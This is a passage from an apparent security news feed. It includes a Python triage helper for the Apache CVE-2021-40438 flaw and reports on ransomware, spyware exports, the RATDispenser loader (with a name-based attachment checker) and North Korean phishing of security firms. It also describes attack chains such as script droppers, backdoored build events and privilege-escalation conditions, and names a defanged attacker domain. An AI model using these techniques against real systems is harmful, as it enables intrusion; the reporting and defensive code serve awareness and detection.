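a host matches both conditions named in the article: Apache HTTP Server
2.4.48 or earlier with mod_proxy loaded. The sample output below is
constructed for the example.
"""
import re
from typing import NamedTuple

# Release that shipped the fix, as stated in the article.
FIXED_VERSION = (2, 4, 49)


class Triage(NamedTuple):
    version: tuple       # (major, minor, patch) parsed from `httpd -v`
    proxy_loaded: bool   # proxy_module present in `httpd -M`
    exposed: bool        # both conditions hold


def parse_version(httpd_v_output: str) -> tuple:
    """Extract (major, minor, patch) from `httpd -v` output.

    The relevant line looks like 'Server version: Apache/2.4.48 (Unix)'.
    """
    m = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", httpd_v_output)
    if not m:
        raise ValueError("no Apache version string found")
    return tuple(int(x) for x in m.groups())


def proxy_module_loaded(httpd_m_output: str) -> bool:
    """True if `httpd -M` lists proxy_module, whether static or shared."""
    return re.search(r"^\s*proxy_module\s+\((static|shared)\)",
                     httpd_m_output, re.MULTILINE) is not None


def triage(httpd_v_output: str, httpd_m_output: str) -> Triage:
    """Combine both checks; a host is exposed only when both are true."""
    version = parse_version(httpd_v_output)
    proxy = proxy_module_loaded(httpd_m_output)
    exposed = version < FIXED_VERSION and proxy
    return Triage(version, proxy, exposed)


# Constructed sample output resembling a pre-fix build with mod_proxy loaded.
SAMPLE_HTTPD_V = """Server version: Apache/2.4.48 (Unix)
Server built:   Jun  1 2021 00:00:00
"""
SAMPLE_HTTPD_M = """Loaded Modules:
 core_module (static)
 so_module (static)
 http_module (static)
 proxy_module (shared)
 proxy_http_module (shared)
"""

if __name__ == "__main__":
    # On a real host, feed in the output of `httpd -v` and `httpd -M`
    # (or `apachectl -v` / `apachectl -M`) captured by your inventory tooling.
    print(triage(SAMPLE_HTTPD_V, SAMPLE_HTTPD_M))
```

A version at or above 2.4.49, or a build without proxy_module, is reported as not exposed; a distribution that backports the fix without bumping the version string would need the vendor's own advisory consulted instead, since this helper compares version numbers only.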

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2021-40438)

Biopharmaceutical firm Supernus Pharmaceuticals hit by Hive ransomware during an ongoing acquisition

29 November 2021 at 13:17

Biopharmaceutical company Supernus Pharmaceuticals discloses a ransomware attack, the Hive ransomware claims to have stolen company data.

Biopharmaceutical company Supernus Pharmaceuticals confirmed it was the victim of a data breach after a ransomware attack hit the firm in mid-November. The company states that the security breach did not impact its operations; it notified government authorities and engaged cybersecurity experts and its outside law firm to respond to the incident. Supernus Pharmaceuticals also declared that it has successfully recovered the encrypted files and has taken additional security measures to prevent future incidents.

“Supernus Pharmaceuticals, Inc. (NASDAQ: SUPN), a biopharmaceutical company, today announced that it was the recent target of a ransomware attack. The attack had no significant impact on the business and did not cause any serious disruption to the Company’s operations. The Company continues to operate without interruption and does not currently anticipate paying any ransom amounts to any criminal ransomware group.” reads the press release published by the company.

The company is a leading biopharmaceutical firm with more than 30 years of experience in developing and commercializing products that treat central nervous system (CNS) diseases.

The Hive ransomware gang claimed responsibility for the attack and published the following message on its dark web leak site:

“On 11.14.2021 SUPERNUS’s network was compromised, encrypted and 1.5 terabytes of data were exfiltrated. Since then Supernus Inc. has been in constant negotiations to prevent a disclosure of this incident because of the pending acquisition of ADAMAS PHARMACEUTICALS, INC. On Nov. 24 SUPERNUS INC. filed this document https://sec.report/Document/0001104659-21-143352/. The document does not contain any information about the breach. SUPERNUS partners and consumers have to be aware of the company’s unethical behavior.”

Supernus Pharmaceuticals

The Hive operators claim to have stolen 1.5TB of data; they also pointed out that the leak of the stolen information could have a serious impact on the ongoing acquisition of ADAMAS PHARMACEUTICALS, INC.

The company added that it has not paid any ransom.

“To date, the Company has not paid any ransom and has been able to restore all of the information encrypted by the criminal ransomware group.” concludes the press release. “Although to date the Company’s business and operations have not been significantly impacted by the incident, there is no assurance that further attacks may not significantly impact the Company’s business or operations and that information improperly obtained by the criminal ransomware group may not be exploited by the criminal ransomware group or other third parties. The Company will take appropriate action to protect any stolen confidential information and will continue to investigate the incident and monitor the situation going forward.”

On Friday, the company filed an 8-K Form with the SEC that also reports the ransomware attack.

Pierluigi Paganini

(SecurityAffairs – hacking, Supernus Pharmaceuticals)

Israel cut cyber export list, excluding totalitarian regimes

29 November 2021 at 08:33

Israel’s Ministry of Defense bans the sale of surveillance software and offensive hacking tools to dozens of countries.

Israel’s Ministry of Defense has cut the list of countries to which Israeli surveillance and cybersecurity firms could sell their products and services.

The Israeli Government removed 65 countries from the export list, which now includes only 37 nations.

The export list currently only includes Australia, Austria, Belgium, Bulgaria, Canada, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Iceland, India, Ireland, Italy, Japan, Latvia, Liechtenstein, Lithuania, Luxembourg, Malta, New Zealand, Norway, Portugal, Romania, Slovakia, Slovenia, South Korea, Spain, Sweden, Switzerland, the Netherlands, the U.K., and the U.S.

“Israel has updated the list of countries local companies are permitted to sell cybersecurity tools to, reducing the overall number to 37 countries, down from 102.” reports Calcalistech. “Assuming this claim is correct, it seems that Israel was very lenient in providing approvals for the sale of cyber tools and was aware of all the sales being made by NSO.”

Israel’s Ministry of Defense removed from the list countries such as Morocco, Mexico, Saudi Arabia, and the UAE, which abused the surveillance software acquired from the Israeli firm NSO Group.

The decision to cut the list comes after the US Commerce Department’s Bureau of Industry and Security (BIS) announced sanctions against four companies for the development of spyware or the sale of hacking tools used by nation-state actors. The firms are NSO Group and Candiru from Israel, Computer Security Initiative Consultancy PTE. LTD from Singapore, and Positive Technologies from Russia.

NSO Group and Candiru are being sanctioned for the development and sale of surveillance software used to spy on journalists and activists. 

Recently, Apple has sued NSO Group and its parent company Q Cyber Technologies in a U.S. federal court for illegally targeting its customers with the surveillance spyware Pegasus.

According to the lawsuit, NSO Group is accountable for hacking into Apple’s iOS-based devices using zero-click exploits. The software developed by the surveillance firm was used to spy on activists, journalists, researchers, and government officials.

The legal action aims at permanently preventing the infamous company from breaking into any Apple software, services, or devices.

“The new list will significantly complicate matters for Israeli cybersecurity companies, especially those selling offensive cyber tools, to operate in countries with totalitarian regimes or with a record of violating human rights.” concludes Calcalistech. “The Israeli cybersecurity sector currently generates $10 billion in annual revenue, with offensive cyber believed to be responsible for 10% of those sales. Some 13% of all cybersecurity companies operate from Israel, with 29% of all investments in the sector being directed to Israeli companies.”

Pierluigi Paganini

(SecurityAffairs – hacking, surveillance)

French court indicted Nexa Technologies for complicity in acts of torture

28 November 2021 at 23:21

Nexa Technologies was indicted for complicity in acts of torture; the French firm is accused of having sold surveillance equipment to Egypt.

Nexa Technologies offers a range of solutions for homeland security, including surveillance solutions. The French company is now accused of having sold surveillance software to the Egyptian regime.

The cybersurveillance equipment was used by the Egyptian government to track down opponents.

Today the Agence France-Presse (AFP) revealed that Nexa Technologies was indicted on October 12 for “complicity in acts of torture and enforced disappearances.”

“The indictment was pronounced on October 12 by the investigating judge in charge of the investigations, about four months after those of four executives and managers of the company, according to this source, confirmed by a judicial source. Contacted by AFP, the lawyer for Nexa Technologies, François Zimeray, declined to comment.” reported the website LeMonde.

The investigation began in 2017 following a complaint by FIDH and LDH filed with the support of the Cairo Institute for Human Rights Studies (CIHRS).

The complaint refers to the revelation made by the magazine Télérama, which reported the sale in March 2014 of “a listening system at 10 million euros to fight – officially – against the Muslim Brotherhood”, the Islamist opposition in Egypt.

The case was based on an investigation by Télérama revealing the sale, in March 2014, of surveillance equipment called Cerebro that was used against the Muslim Brotherhood.

“A 10 million euro listening system to fight – officially – against the Muslim Brotherhood. In two months, the case was heard. The contract was signed in March 2014. Code name of the operation: “Toblerone”. A cryptic nod to the triangular shape of the pyramids …” reported Télérama. “In short, Cerebro can suck up any data that is not encrypted. A weapon of choice for authoritarian governments.”

The Cerebro surveillance software allows real-time spying on a target’s electronic communications. The software was allegedly used to repress opponents of Abdel Fattah Al-Sisi and allowed the government to identify and arrest more than 40,000 political opponents in Egypt.

“In all, according to Human Rights Watch and other international organizations, between 40,000 and 60,000 political prisoners are languishing in jails in a country where civil society no longer has any rights.” continues Télérama.

The software also allows dragnet surveillance; according to the brochures presented at Milipol, it is an updated copy of Eagle, the program ceded to Gaddafi in 2007.

Pierluigi Paganini

(SecurityAffairs – hacking, IKEA)

RATDispenser, a new stealthy JavaScript loader used to distribute RATs

28 November 2021 at 15:25

RATDispenser is a new stealthy JavaScript loader that is being used to spread multiple remote access trojans (RATs) in the wild.

Researchers from the HP Threat Research team have discovered a new stealthy JavaScript loader, dubbed RATDispenser, that is being used to spread a variety of remote access trojans (RATs) in the wild. Experts pointed out that JavaScript is an uncommon file format for malware, and for this reason it is less likely to be detected.

The loader is highly evasive: at the time of the analysis it had only an 11% detection rate on VirusTotal. HP experts confirmed that it was employed to distribute at least eight RAT families during 2021 (STRRAT, WSHRAT, AdWind, Formbook, Remcos, Panda Stealer, GuLoader, and Ratty). The experts believe that the threat actors behind RATDispenser may be operating a malware-as-a-service model.

“As with most attacks involving JavaScript malware, RATDispenser is used to gain an initial foothold on a system before launching secondary malware that establishes control over the compromised device. Interestingly, our investigation found that RATDispenser is predominantly being used as a dropper (in 94% of samples analyzed), meaning the malware doesn’t communicate over the network to deliver a malicious payload.” reads the report published by HP.

The attack chain starts with a phishing email carrying a JavaScript attachment that uses a ‘.TXT.js’ double extension to trick victims into believing that they are opening a harmless text file.

RATDispenser

Upon launching the malicious code, the JavaScript decodes itself at runtime and writes a VBScript file to the %TEMP% folder using cmd.exe. Then the VBScript downloads and executes the final RAT payload.

HP researchers ran a retrohunt over the last three months with their YARA rule and identified 155 RATDispenser samples belonging to three different variants. The experts also wrote a Python script to recover the final payload and discovered that:

  • 145 of the 155 samples (94%) were droppers. Only 10 samples were downloaders that communicate over the network to download a secondary stage of malware.
  • 8 malware families were delivered as payloads.
  • All the payloads were remote access Trojans (RATs), keyloggers and information stealers.

STRRAT and WSHRAT accounted for 81% of the samples analyzed by the researchers. “Using each sample’s earliest scan result, on average the RATDispenser samples were only detected by 11% of available anti-virus engines, or eight engines in absolute numbers.” continues the report.
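The lure described above relies on a document-looking name ending in a script-host extension (‘.TXT.js’), which a mail gateway can flag before any content analysis. The following attachment-name triage is an added example written for this page, not HP's extraction script or YARA rule; the attachment names it checks are constructed, and the extension lists are the author's own choice of what Windows Script Host or cmd.exe will execute versus what a user reads as a harmless document.

```python
"""Attachment-name triage for double-extension script lures such as
'Order_Details.TXT.js' (added example, not code from HP or the article).

Sample attachment names below are constructed for the example.
"""
from typing import List, NamedTuple

# Extensions that Windows Script Host or cmd.exe run on double-click
# (assumed list for the example; extend it to match your environment).
SCRIPT_EXTENSIONS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "cmd", "bat"}
# Extensions users read as harmless documents or images (assumed list).
DECOY_EXTENSIONS = {"txt", "pdf", "doc", "docx", "xls", "xlsx", "jpg", "png"}


class Verdict(NamedTuple):
    filename: str
    flagged: bool
    reason: str


def split_extensions(filename: str) -> List[str]:
    """Return the lower-cased extension chain: 'a.TXT.js' -> ['txt', 'js'].

    Each part is whitespace-stripped so padding such as 'report.pdf     .js',
    used to push the real extension out of view, does not hide the decoy.
    """
    parts = filename.strip().lower().split(".")
    return [p.strip() for p in parts[1:]] if len(parts) > 1 else []


def triage_attachment(filename: str) -> Verdict:
    """Flag script-host attachments; call out the decoy when one is present."""
    exts = split_extensions(filename)
    if not exts:
        return Verdict(filename, False, "no extension")
    final = exts[-1]
    if final not in SCRIPT_EXTENSIONS:
        return Verdict(filename, False, f".{final} is not a script-host extension")
    if len(exts) >= 2 and exts[-2] in DECOY_EXTENSIONS:
        # The RATDispenser pattern: a benign-looking extension masks the script.
        return Verdict(filename, True, f"decoy .{exts[-2]} masks executable .{final}")
    return Verdict(filename, True, f"script attachment .{final}")


def triage_many(filenames: List[str]) -> List[Verdict]:
    return [triage_attachment(f) for f in filenames]


# Constructed sample attachment names, not from any real campaign.
SAMPLE_ATTACHMENTS = [
    "Order_Details.TXT.js",       # the lure pattern from the article
    "Invoice.pdf          .js",   # padded variant of the same trick
    "notes.txt",                  # genuine text file
    "run.vbs",                    # bare script, still worth quarantining
    "README",                     # no extension at all
    "photo.jpg",                  # harmless image
]

if __name__ == "__main__":
    for verdict in triage_many(SAMPLE_ATTACHMENTS):
        print(f"{'FLAG' if verdict.flagged else 'pass':4}  {verdict.filename!r}: {verdict.reason}")
```

The check is deliberately name-based so it runs before the body is decoded; it complements, rather than replaces, content scanning, since the loader's low engine coverage is the reason the name is worth acting on early.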

HP researchers published a set of hashes, URLs, YARA rule and extraction script in the HP Threat Research GitHub repository.

Pierluigi Paganini

(SecurityAffairs – hacking, RATDispenser)

North Korea-linked Zinc group posed as Samsung recruiters to target security firms

28 November 2021 at 12:11

North Korea-linked threat actors posed as Samsung recruiters in a spear-phishing campaign aimed at employees at South Korean security firms.

A North Korea-linked APT group posed as Samsung recruiters in a spear-phishing campaign that targeted South Korean security companies that sell anti-malware solutions, Google TAG researchers reported.

According to the Google Threat Horizons report, the state-sponsored hackers sent fake job offers to employees at the security companies. Google TAG researchers reported that the same group, tracked as Zinc, also targeted security researchers in past campaigns.

“TAG observed a North Korean government-backed attacker group that previously targeted security researchers posing as recruiters at Samsung and sending fake job opportunities to employees at multiple South Korean information security companies that sell anti-malware solutions.” reads the Google Threat Horizons report. “The emails included a PDF allegedly claiming to be of a job description for a role at Samsung; however, the PDFs were malformed and did not open in a standard PDF reader. When targets replied that they could not open the job description, attackers responded with a malicious link to malware purporting to be a “Secure PDF Reader” stored in Google Drive which has now been blocked.”

The attackers used a malformed PDF claiming to be a job description for a role at Samsung; since the recipient was not able to open it, they contacted the sender, who in turn provided a link to a “Secure PDF Reader” app.

The app, which was stored in Google Drive, was a tainted version of the legitimate PDF reader PDFTron. Upon installation, the app established a backdoor on the victims’ devices.

North Korea-linked APT phishing

The activity of the Zinc APT group, aka Lazarus, surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks. This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack. In the earlier campaign against security researchers, the attackers targeted their victims through multiple social networking platforms, including Twitter, LinkedIn, Telegram, Discord, and Keybase.

Threat actors used a network of fake profiles to get in contact with researchers of interest. In mid-2020, ZINC hackers created Twitter profiles for fake security researchers that were used to retweet security content and post about vulnerability research.

North Korea

Attackers used Twitter profiles for sharing links to a blog under their control (br0vvnn[.]io), to share videos of their claimed exploits, and for amplifying and retweeting posts from other accounts under their control.

Once initial communications were established, the attackers would ask the targeted security researcher whether they wanted to collaborate on vulnerability research, and then shared a Visual Studio project with them.

The Visual Studio project used by the attackers included source code for exploiting the vulnerability along with an additional DLL, a backdoor, that would be executed through Visual Studio Build Events.

The malicious DLL contained in the Visual Studio project would be executed when researchers compiled the project.

The malicious code would lead to the installation of a backdoor that would allow the attackers to take over the target’s computer.

The attackers published a blog post titled “DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug” and shared it via Twitter. The researchers who visited the post from October 19 to 21, 2020, using the Chrome browser, were infected with known ZINC malware. Microsoft researchers noticed that some of the victims were using fully patched browsers, which suggests that the attackers used 0-day exploits. Not all visitors to the site were infected.

Attackers also used other techniques to target security professionals; for example, in some cases they distributed blog posts as MHTML files containing obfuscated JavaScript that pointed to a ZINC-controlled domain for further JavaScript to execute.

In one case, attackers attempted to exploit, without success, the CVE-2017-16238 vulnerability in a vulnerable driver for the antivirus product called Vir.IT eXplorer.

The recent attacks against South Korean anti-malware vendors suggest that the threat actors are interested in compromising the supply chain of South Korean security organizations in order to target their customers.

Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

0patch releases unofficial patches for CVE-2021-24084 Windows 10 zero-day

28 November 2021 at 10:55

0patch released free unofficial patches for Windows local privilege escalation zero-day (CVE-2021-24084) in Windows 10, version 1809 and later.

0patch released free unofficial patches for Windows local privilege escalation zero-day (CVE-2021-24084) in Windows 10, version 1809 and later. The issue doesn’t impact Windows Servers because the vulnerable functionality is not implemented in these OSs.

The issue resides in the “Access work or school” settings of the Mobile Device Management Service. The vulnerability, discovered by the security researcher Abdelhamid Naceri, can be exploited to bypass a patch released by Microsoft in February to address another information disclosure flaw (CVE-2021-24084) reported by the same expert.

Naceri reported this month that the vulnerability has yet to be addressed and can be exploited to escalate privileges.

I mean this is still unpatched and allows LPE if shadow volume copies are enabled;
But I noticed that it doesn't work on Windows 11 https://t.co/HJcZ6ew8PO

— Abdelhamid Naceri (@KLINIX5) November 15, 2021

“Namely, as HiveNightmare/SeriousSAM has taught us, an arbitrary file disclosure can* be upgraded to local privilege escalation if you know which files to take and what to do with them. We confirmed this by using the procedure described in this blog post by Raj Chandel in conjunction with Abdelhamid’s bug – and being able to run code as local administrator.” wrote 0patch co-founder Mitja Kolsek. “Two conditions need to be met in order for the local privilege escalation to work:

  1. System protection must be enabled on drive C, and at least one restore point created. Whether system protection is enabled or disabled by default depends on various parameters.  
  2. At least one local administrator account must be enabled on the computer, or at least one “Administrators” group member’s credentials cached.”

0patch released unofficial patches for:

  1. Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates
  2. Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates
  3. Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates
  4. Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates
  5. Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates
  6. Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates

0patch will provide free micropatches for this vulnerability until Microsoft has issued an official patch. Users that want to install the micropatches can create a free account in 0patch Central, then install 0patch Agent from 0patch.com. The company pointed out that no computer reboots will be needed.

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

Security Affairs newsletter Round 342

28 November 2021 at 10:38

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Italy’s Antitrust Agency fines Apple and Google for aggressive practices of data acquisition
HAEICHI-II: Interpol arrested +1,000 suspects linked to various cybercrimes
IKEA hit by a cyber attack that uses stolen internal reply-chain emails
Marine services provider Swire Pacific Offshore (SPO) hit by Clop ransomware
Threat actors target crypto and NFT communities with Babadeda crypter
Exclusive: Resecurity discovered 0-day vulnerability in TP-Link Wi-Fi 6 devices
APT C-23 group targets Middle East with an enhanced Android spyware variant
New Linux CronRAT hides in cron jobs to evade detection in Magecart attacks
Several GoDaddy brands impacted in recent data breach
Iranian threat actors exploit MS MSHTML bug to steal Google and Instagram credentials
FBI warns of crooks targeting online shoppers during the holiday season
VMware addresses File Read and SSRF flaws in vCenter Server
A vulnerable honeypot exposed online can be compromised in 24 hours
Apple sues NSO Group for abusing state-sponsored Pegasus spyware
Expert discloses details of flaws in Oracle VirtualBox
Malware are already attempting to exploit new Windows Installer zero-day
Android.Cynos.7.origin trojan infected +9 million Android devices
Experts warn of RCE flaw in Imunify360 security platform
Expert released PoC exploit code for Microsoft Exchange CVE-2021-42321 RCE bug
Expert disclosed an exploit for a new Windows zero-day local privilege elevation issue
US govt warns critical infrastructure of ransomware attacks during holidays
New GoDaddy data breach impacted 1.2 million customers
Utah Imaging Associates data breach impacts 583,643 patients
Iran’s Mahan Air claims it has failed a cyber attack, hackers say the opposite
New Memento ransomware uses password-protected WinRAR archives to block access to the files
US SEC warns investors of ongoing fraudulent communications claiming from the SEC
Experts found 11 malicious Python packages in the PyPI repository
Researchers were able to access the payment portal of the Conti gang
Attackers compromise Microsoft Exchange servers to hijack internal email chains

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

Italy’s Antitrust Agency fines Apple and Google for aggressive practices of data acquisition

27 November 2021 at 16:32

Italy’s antitrust regulator, Autorità Garante della Concorrenza e del Mercato (AGCM), has fined Apple and Google €10 million each for their “aggressive” data practices.

Italy’s antitrust regulator, Autorità Garante della Concorrenza e del Mercato (AGCM), has fined Apple and Google €10 million each for their “aggressive” data practices and for the lack of transparency on the use of customers’ personal data.

Both companies were fined due to violations of the Consumer Code for aggressive practices related to the acquisition and use of consumer data for commercial purposes.

Italy’s antitrust regulator has fined both Apple and Google €10 million each for what it calls “aggressive” data practices and for not providing consumers with clear information on the commercial uses of their personal data during the account creation phase. 10 million euros is the maximum fine permitted under current legislation.

“The Authority found that both Google and Apple did not provide clear and immediate information on the acquisition and use of user data for commercial purposes.” reads the press release published by the AGCM. “In particular, Google, both in the account creation phase, which is essential for the use of all the services offered, and during the use of the services themselves, omits relevant information that the consumer needs to consciously decide to accept that the Company collects and uses their personal information for commercial purposes. Apple, both in the phase of creating the Apple ID and on the occasion of accessing the Apple Stores (App Store, iTunes Store and Apple Books), does not immediately and explicitly provide the user with any indication on the collection and use of their data for commercial purposes, emphasizing only that data collection is necessary to improve the consumer experience and use of services.”

The Italian Authority pointed out that in the account creation phase, Google pre-sets the user’s acceptance of the transfer and/or use of their data for commercial purposes.

In the case of Apple, the IT giant was accused of acquiring consent to the use of user data for commercial purposes without providing the consumer with the possibility of a prior and express consent on sharing their data.

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)
